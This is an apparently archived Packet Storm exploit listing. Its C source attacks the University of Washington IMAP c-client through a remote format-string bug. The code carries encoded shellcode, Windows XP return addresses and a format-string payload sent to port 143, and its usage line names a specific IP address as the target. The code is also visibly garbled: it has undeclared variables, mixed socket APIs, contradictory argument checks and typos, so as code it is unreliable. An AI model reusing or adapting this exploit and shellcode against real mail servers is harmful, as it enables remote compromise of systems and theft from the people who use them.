University of Washington IMAP Format String

2009-02-20T00:00:00
ID PACKETSTORM:75063
Type packetstorm
Reporter Faryad Rahmany
Modified 2009-02-20T00:00:00

Description

                                        
                                            `/*  
  
# This BUg Discover By Faryad Rahmany  
  
# C0d3d by Faryad rahmany  
  
# website : http://rahmany.net  
  
# University Of Washington IMAP c-client Remote FOrmat String  
# Shellcode based on work by vlad902  
  
# Greets to my best Freind : DJ7xpl  
# UG : File Host Port Target  
  
# Target 1 : WIndows XP Sp 1 : 0  
  
# Target 2 : Windows XP Sp 2 : 1  
  
# Target 3 : Windows XP Sp 3 : 2  
  
# Ep : Attack.exe 78.38.23.49 143 2  
  
# Sp Thanks To : AllaH  
# compiled with visual c++ 6 : Attack.c  
  
  
*/  
  
#include <stdio.h>  
#include <stdlib.h>  
#include <errno.h>  
#include <string.h>  
#include <netdb.h>  
#include <sys/types.h>  
#include <netinet/in.h>  
#include <sys/socket.h>  
#define PORT 143  
#define DATAOVERFLOW 2024  
  
int main(int argc, char *argv[])  
{  
  
int sockfd, numbytes;  
unsigned int system;  
char buffer[DATAOVERFLOW];  
char jmp[5];  
struct hostent *he;  
struct sockaddr_in tcp;;  
struct sockaddr_in their_addr;  
char winxpsp1[] = "\x57\x94\xAE\x77"; // not tested  
char winxpsp2[] = "\xED\x1E\x94\x7C";  
char winxpsp3[] = "\x7B\x46\x86\x7C";  
char FAR[] = "\x47\x45\x54\x20\x2F";  
WSADATA wsadata;  
  
  
unsigned char shellcode[] =  
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"  
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"  
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"  
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"  
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x46\x4b\x4e"  
"\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x48"  
"\x4e\x56\x46\x32\x46\x42\x4b\x48\x45\x44\x4e\x43\x4b\x38\x4e\x57"  
"\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x38\x4f\x54\x4a\x41\x4b\x48"  
"\x4f\x55\x42\x32\x41\x30\x4b\x4e\x49\x34\x4b\x48\x46\x53\x4b\x48"  
"\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"  
"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"  
"\x46\x4f\x4b\x43\x46\x35\x46\x42\x4a\x52\x45\x47\x45\x4e\x4b\x48"  
"\x4f\x35\x46\x32\x41\x50\x4b\x4e\x48\x46\x4b\x58\x4e\x30\x4b\x34"  
"\x4b\x58\x4f\x35\x4e\x31\x41\x30\x4b\x4e\x43\x30\x4e\x42\x4b\x38"  
"\x49\x38\x4e\x36\x46\x52\x4e\x51\x41\x46\x43\x4c\x41\x53\x4b\x4d"  
"\x46\x56\x4b\x38\x43\x44\x42\x33\x4b\x58\x42\x44\x4e\x50\x4b\x58"  
"\x42\x47\x4e\x41\x4d\x4a\x4b\x58\x42\x34\x4a\x50\x50\x45\x4a\x56"  
"\x50\x58\x50\x54\x50\x50\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x46"  
"\x43\x35\x48\x46\x4a\x36\x43\x53\x44\x53\x4a\x46\x47\x47\x43\x47"  
"\x44\x33\x4f\x55\x46\x55\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e"  
"\x4e\x4f\x4b\x33\x42\x55\x4f\x4f\x48\x4d\x4f\x55\x49\x58\x45\x4e"  
"\x48\x56\x41\x38\x4d\x4e\x4a\x50\x44\x50\x45\x35\x4c\x36\x44\x50"  
"\x4f\x4f\x42\x4d\x4a\x36\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x55"  
"\x4f\x4f\x48\x4d\x43\x45\x43\x55\x43\x45\x43\x45\x43\x35\x43\x54"  
"\x43\x55\x43\x54\x43\x55\x4f\x4f\x42\x4d\x48\x36\x4a\x56\x41\x31"  
"\x4e\x45\x48\x56\x43\x45\x49\x48\x41\x4e\x45\x59\x4a\x46\x46\x4a"  
"\x4c\x31\x42\x47\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x56\x42\x51"  
"\x41\x35\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x52"  
"\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x35\x45\x55\x4f\x4f\x42\x4d"  
"\x4a\x36\x45\x4e\x49\x34\x48\x58\x49\x34\x47\x55\x4f\x4f\x48\x4d"  
"\x42\x45\x46\x55\x46\x55\x45\x55\x4f\x4f\x42\x4d\x43\x49\x4a\x56"  
"\x47\x4e\x49\x47\x48\x4c\x49\x57\x47\x45\x4f\x4f\x48\x4d\x45\x35"  
"\x4f\x4f\x42\x4d\x48\x46\x4c\x36\x46\x46\x48\x46\x4a\x56\x43\x46"  
"\x4d\x46\x49\x48\x45\x4e\x4c\x56\x42\x35\x49\x35\x49\x32\x4e\x4c"  
"\x49\x58\x47\x4e\x4c\x36\x46\x54\x49\x48\x44\x4e\x41\x43\x42\x4c"  
"\x43\x4f\x4c\x4a\x50\x4f\x44\x44\x4d\x42\x50\x4f\x44\x54\x4e\x32"  
"\x43\x59\x4d\x58\x4c\x47\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36"  
"\x44\x47\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x37\x46\x54\x4f\x4f"  
"\x48\x4d\x4b\x35\x47\x35\x44\x45\x41\x55\x41\x55\x41\x45\x4c\x56"  
"\x41\x50\x41\x45\x41\x55\x45\x35\x41\x35\x4f\x4f\x42\x4d\x4a\x46"  
"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x55\x4f\x4f\x48\x4d\x4c\x36"  
"\x4f\x4f\x4f\x4f\x47\x43\x4f\x4f\x42\x4d\x4b\x48\x47\x55\x4e\x4f"  
"\x43\x38\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x35\x4f\x4f\x42\x4d"  
"\x4a\x46\x42\x4f\x4c\x38\x46\x50\x4f\x45\x43\x45\x4f\x4f\x48\x4d"  
"\x4f\x4f\x42\x4d\x5a";  
  
if(argc < 3){  
printf("***********************************************  
\n"  
" This BUg Discover By Faryad Rahmany  
\n"  
" C0d3d by Faryad rahmany  
\n"  
" website : http://rahmany.net  
\n"  
" University Of Washington IMAP c-client Remote FOrmat String \n"  
" Shellcode based on work by vlad902  
\n"  
" Greets to my best Freind : DJ7xpl  
\n"  
" UG : File Host Port Target  
\n"  
" Target 1 : WIndows XP Sp 1 : 0  
\n"  
" Target 2 : Windows XP Sp 2 : 1  
\n"  
" Target 3 : Windows XP Sp 3 : 2  
\n"  
" Ep : Attack.exe 78.38.23.49 143 2  
\n"  
" Sp Thanks To : AllaH  
\n"  
" compiled with visual c++ 6 : Attack.c  
\n"  
"***********************************************\n",  
argv[1]);  
exit(-1);  
}  
printf("\n Attack on University Of Washington IMAP c-client");  
system = (unsigned short)atoi(argv[3]);  
switch(system)  
{  
case 1:  
strcat(jmp,winxpsp1);  
break;  
case 2:  
strcat(jmp,winxpsp2);  
break;  
case 3 :  
strcat(jmp,winxpsp3);  
break;  
default:  
printf("\n\r this target not find this list and exit \n\r");  
exit(-1);  
}  
printf(" building Format string \n");  
memset(buffer,shellcode,DATAOVERFLOW);  
memcpy(buffer,shellcode,sizeof(shellcode)-1);  
memcpy(buffer+256,jmp,sizeof(jmp)-1);  
memcpy(buffer+243,FAR,sizeof(FAR)-1);  
buffer[DATAOVERFLOW] = 0;  
if (argc != 2) {  
fprintf(stderr,"usage: client hostname\n");  
exit(1);  
}  
if ((he=gethostbyname(argv[1])) == NULL) {  
herror("gethostbyname");  
exit(1);  
}  
if ((!he) && (addr == INADDR_NONE) ){  
printf("unable to resolve %s\n",argv[1]);  
exit(-1);  
}  
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);  
if (!sock){  
printf("Fuck socket error\n");  
exit(-1);  
}  
printf("\nAttack on University Of Washington IMAP c-client %s\n" ,  
argv[1]) ;  
Sleep(900);  
printf("\npachet Send size = %d byte\n" , sizeof(buffer));  
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {  
perror("socket");  
exit(1);  
}  
if ( WSAStartup(wVersionRequested, &wsadata) )  
{  
printf ("Erreur d'initialisation winsock !\n");  
ExitProcess (1);  
}  
their_addr.sin_family = AF_INET;  
their_addr.sin_port = htons(PORT);  
their_addr.sin_addr = *((struct in_addr *)he-h_addr);  
bzero(&(their_addr.sin_zero), 8);  
printf("\nSending exploit string...\n");  
printf ("connecting to %s on port %u...", argv[1], ntohs ( sin.sin_port )  
);  
if (connect(sockfd, (struct sockaddr *)&their_addr, \  
sizeof(struct sockaddr)) == -1) {  
perror("connect");  
exit(1);  
}  
fprintf(FILEsock,  
"\xeb\x29"  
"%%8x%%8x%%8x%%8x%%8x%%8x%%8x%%8x%%%dd%%n%%n@@@@@@@@%s\r\n",  
0x3C63FF-0x4f,shellcode);  
if ((numbytes=recv(sockfd, buffer,DATAOVERFLOW, 0)) == -1) {  
perror("recv");  
exit(1);  
}  
buffer[numbytes] = '\0';  
printf("Received: %s",buffer);  
shutdown(sockfd,1);  
closesocket(sockfd);  
}  
return 0;  
}  
  
`